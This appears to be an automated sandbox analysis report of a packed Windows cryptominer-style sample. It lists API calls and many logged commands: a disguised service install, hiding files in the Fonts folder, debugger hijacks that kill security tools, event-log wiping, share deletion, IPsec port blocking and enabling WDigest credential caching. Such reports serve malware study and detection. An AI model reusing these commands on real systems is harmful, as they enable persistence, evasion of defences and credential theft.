RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73db6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73db6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73db27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73db2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73db253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73db2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73db25ab
wmic+0x39c80 @ 0x899c80
wmic+0x3b06a @ 0x89b06a
wmic+0x3b1f8 @ 0x89b1f8
wmic+0x36fcd @ 0x896fcd
wmic+0x3d6e9 @ 0x89d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2746992
registers.edi: 1974991376
registers.eax: 2746992
registers.ebp: 2747072
registers.edx: 1
registers.ebx: 2878908
registers.esi: 2147746133
registers.ecx: 1539098129
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 48230748
registers.edi: 2757844
registers.eax: 48230748
registers.ebp: 48230828
registers.edx: 49
registers.ebx: 48231112
registers.esi: 2147746133
registers.ecx: 2516344
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1108760
registers.edi: 1974991376
registers.eax: 1108760
registers.ebp: 1108840
registers.edx: 1
registers.ebx: 2485668
registers.esi: 2147746133
registers.ecx: 1538746585
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3240
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f41000
process_handle: 0xffffffff
1 0 0
name TEXTINCLUDE language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d82ce0 size 0x00000151
name RT_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d831d0 size 0x000000b4
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_MENU language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d91424 size 0x00000284
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_GROUP_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d93100 size 0x00000022
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d931a0 size 0x00000014
file c:\Windows\Fonts\svchost.exe
file C:\Users\test22\AppData\Local\Temp\tem.vbs
file c:\Windows\Fonts\conhost.exe
file C:\Windows\Temp\csonhost.bat
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\conhost.exe
filepath: c:\Windows\Fonts\conhost.exe
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\svchost.exe
filepath: c:\Windows\Fonts\svchost.exe
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\WinRing0x64.sys
filepath: c:\Windows\Fonts\WinRing0x64.sys
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Local\Temp\tem.vbs
filepath: C:\Users\test22\AppData\Local\Temp\tem.vbs
1 1 0
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 2
password:
display_name: MetPipAtcivator
filepath: c:\Windows\Fonts\svchost.exe
service_name: MetPipAtcivator
filepath_r: c:\windows\Fonts\svchost.exe
desired_access: 983551
service_handle: 0x0000000000253a80
error_control: 1
service_type: 16
service_manager_handle: 0x0000000000253a50
1 2439808 0
cmdline attrib +s +h +r C:\Windows\svchost.exe
cmdline c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
cmdline takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline c:\windows\Fonts\svchost.exe start MetPipAtcivator
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline taskkill /f /t /im powershell.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
cmdline c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
cmdline wevtutil cl "windows powershell"
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
cmdline cacls C:\Windows\svchost.exe /d everyone
file C:\Users\test22\AppData\Local\Temp\tem.vbs
file C:\Users\test22\AppData\Local\Temp\iexplore.exe
wmi SELECT * FROM Win32_Process WHERE name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'
wmi SELECT * FROM Win32_Process WHERE name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'
wmi SELECT * FROM Win32_Process WHERE name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
wmi SELECT * FROM Win32_Process WHERE name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'
section UPX1 size_of_data 0x003e3c00 virtual_address 0x009b3000 virtual_size 0x003e4000 entropy 7.999944304938328 description A section with a high entropy has been found
section .rsrc size_of_data 0x0000dc00 virtual_address 0x00d97000 virtual_size 0x0000e000 entropy 6.9456545060373385 description A section with a high entropy has been found
entropy 1.0 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
cmdline sc stop MetPipAtcivator
cmdline attrib +s +h +r C:\Windows\svchost.exe
cmdline net stop mssecsvc2.0
cmdline net stop mssecsvc2.1
cmdline sc delete mssecsvc2.1
cmdline sc delete Graphipcs_PerfSvcs
cmdline attrib -s -h -r -a C:\Windows\Fonts
cmdline net share d$ /delete
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
cmdline sc config PolicyAgent start= AUTO
cmdline sc stop MicrosotMaims
cmdline attrib +s +h +r C:\Windows\boy.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
cmdline sc stop Graphipcs_PerfSvcs
cmdline sc delete MicrosotMais
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
cmdline taskkill /f /t /im sqlservr.exe
cmdline attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
cmdline taskkill /f /t /im boy.exe
cmdline netsh ipsec static del all
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
cmdline sc delete MetPipAtcivator
cmdline net user mm123$ /del
cmdline taskkill /f /t /im powershell.exe
cmdline netsh ipsec static add filterlist name=denylist
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
cmdline netsh ipsec static add filterlist name=Allowlist
cmdline taskkill /f /t /im d1lhots.exe
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
cmdline wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
cmdline sc delete MicrosotMaims
cmdline taskkill /f /t /im lsars.exe /im lsacs.exe
cmdline sc stop MicrosotMais
cmdline sc delete SetPipAtcivator
cmdline netsh ipsec static add filteraction name=deny action=block
cmdline sc delete "Application Layre Gateway Saervice"
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
cmdline net share iPC$ /delete
cmdline taskkill /f /t /im dl1hots.exe
cmdline attrib +s +h +r C:\Windows\Fonts\csrss.exe
cmdline sc stop "Application Layre Gateway Saervice"
cmdline attrib +s +h +r C:\Windows\lsass.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
cmdline net share e$ /delete
cmdline netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
cmdline netsh ipsec static set policy name=Aliyun assign=y
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x005f45c0
service_name: Browser
control_code: 1
1 1 0

ControlService

service_handle: 0x005fd950
service_name: LanmanServer
control_code: 1
1 1 0
Time & API Arguments Status Return Repeated

EnumServicesStatusW

service_handle: 0x0000000000333a50
service_type: 59
service_status: 3
0 0
service_name MetPipAtcivator service_path c:\Windows\Fonts\svchost.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger reg_value C:\\WINDOWS\\system32\\svchost.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger reg_value taskkill.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process cmd /c C:\Windows\TEMP\csonhost.bat
parent_process iexplore.exe martian_process cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
cmd sc stop metpipatcivator
cmd attrib +s +h +r c:\windows\svchost.exe
cmd cacls c:\windows\system32\sethc.exe /e /d service
cmd c:\windows\fonts\svchost.exe set metpipatcivator displayname network location service
cmd takeown /f c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /a
cmd net stop mssecsvc2.0
cmd net stop mssecsvc2.1
cmd c:\users\test22\appdata\local\temp\tem.vbs
cmd wevtutil cl "system"
cmd sc delete mssecsvc2.1
cmd sc delete graphipcs_perfsvcs
cmd attrib -s -h -r -a c:\windows\fonts
cmd net share d$ /delete
cmd reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /f
cmd sc config policyagent start= auto
cmd sc stop microsotmaims
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g administrators:r
cmd cacls c:\windows\fonts\csrss.exe /d everyone
cmd attrib +s +h +r c:\windows\boy.exe
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\hipsdaemon.exe" /v "debugger" /d taskkill.exe /f
cmd sc stop graphipcs_perfsvcs
cmd sc delete microsotmais
cmd takeown /f c:\windows\syswow64\conhost.exe /a
cmd c:\windows\fonts\svchost.exe start metpipatcivator
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
cmd taskkill /f /t /im sqlservr.exe
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d system
cmd c:\windows\system32\net1 share f$ /delete
cmd attrib +s +h +r c:\windows\fonts\sqlservr.exe
cmd taskkill /f /t /im boy.exe
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g users:r
cmd netsh ipsec static del all
cmd c:\windows\system32\net1 stop lanmanserver /y
cmd c:\windows\system32\net1 share ipc$ /delete
cmd reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\net.exe" /f
cmd c:\windows\system32\net1 share c$ /delete
cmd wevtutil cl "security"
cmd sc delete metpipatcivator
cmd net user mm123$ /del
cmd taskkill /f /t /im powershell.exe
cmd netsh ipsec static add filterlist name=denylist
cmd c:\windows\system32\net1 share e$ /delete
cmd c:\windows\system32\cmd.exe /s /d /c" echo y"
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\curl.exe" /v "debugger" /d taskkill.exe /f
cmd net1 user mm123$ /del
cmd c:\windows\system32\net1 share d$ /delete
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d service
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /g administrators:f
cmd netsh ipsec static add filterlist name=allowlist
cmd cacls c:\windows\system32\sethc.exe /e /g administrators:r
cmd cacls c:\windows\fonts\sqlservr.exe /d everyone
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d "network service"
cmd taskkill /f /t /im d1lhots.exe
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d service
cmd c:\windows\fonts\svchost.exe set metpipatcivator description provides performance library information from windows management.
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d system
cmd netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
cmd netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
cmd netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
cmd netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
cmd wmic process where "name='sqlservr.exe' and executablepath='c:\\windows\\fonts\\sqlservr.exe'" call terminate
cmd sc delete microsotmaims
cmd cacls c:\windows\system32\sethc.exe /e /d "network service"
cmd c:\windows\system32\cmd.exe /s /d /c" echo y"
cmd taskkill /f /t /im lsars.exe /im lsacs.exe
cmd sc stop microsotmais
cmd sc delete setpipatcivator
cmd netsh ipsec static add filteraction name=deny action=block
cmd sc delete "application layre gateway saervice"
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
cmd takeown /f c:\windows\system32\windowspowershell\v1.0\powershell.exe /a
cmd net share ipc$ /delete
cmd c:\windows\system32\net1 share admin$ /delete
cmd taskkill /f /t /im dl1hots.exe
cmd cacls c:\windows\syswow64\conhost.exe /d everyone
cmd attrib +s +h +r c:\windows\fonts\csrss.exe
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g users:r
cmd cacls c:\windows\system32\sethc.exe /e /g system:r
cmd sc stop "application layre gateway saervice"
cmd attrib +s +h +r c:\windows\lsass.exe
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d c:\\windows\\system32\\svchost.exe /f
cmd cacls c:\windows\boy.exe /d everyone
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
cmd c:\windows\system32\net1 stop mssecsvc2.0
cmd c:\windows\system32\net1 stop mssecsvc2.1
cmd net share e$ /delete
cmd netsh ipsec static add rule name=deny1 policy=aliyun filterlist=denylist filteraction=deny
cmd netsh ipsec static set policy name=aliyun assign=y
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\certutil.exe" /v "debugger" /d taskkill.exe /f
cmd cmd /c attrib -s -h -r -a %systemroot%\fonts
cmd cacls c:\windows\lsass.exe /d everyone
cmd cacls c:\windows\system32\sethc.exe /g administrators:f
cmd cacls c:\windows\system32\sethc.exe /e /g users:r
cmd sc start metpipatcivator
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /g administrators:f
cmd wmic process where "name='conhost.exe' and executablepath='c:\\windows\\syswow64\\conhost.exe'" call terminate
cmd sc config lanmanserver start= disabled
cmd net share f$ /delete
cmd takeown /f c:\windows\system32\sethc.exe /a
cmd c:\windows\fonts\svchost.exe install metpipatcivator c:\windows\fonts\conhost.exe
cmd cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d "network service"
cmd sc delete mssecsvc2.0
cmd sc stop conhost
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d taskkill.exe /f
cmd sc stop setpipatcivator
cmd wmic process where "name='csrss.exe' and executablepath='c:\\windows\\fonts\\csrss.exe'" call terminate
cmd netsh ipsec static add filteraction name=allow action=permit
cmd sc delete conhost
cmd cacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g administrators:r
cmd reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f
cmd net share c$ /delete
cmd c:\windows\system32\net1 user mm123$ /del
cmd cmd /c c:\windows\temp\csonhost.bat
cmd net share admin$ /delete
cmd reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /f
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
cmd net stop lanmanserver /y
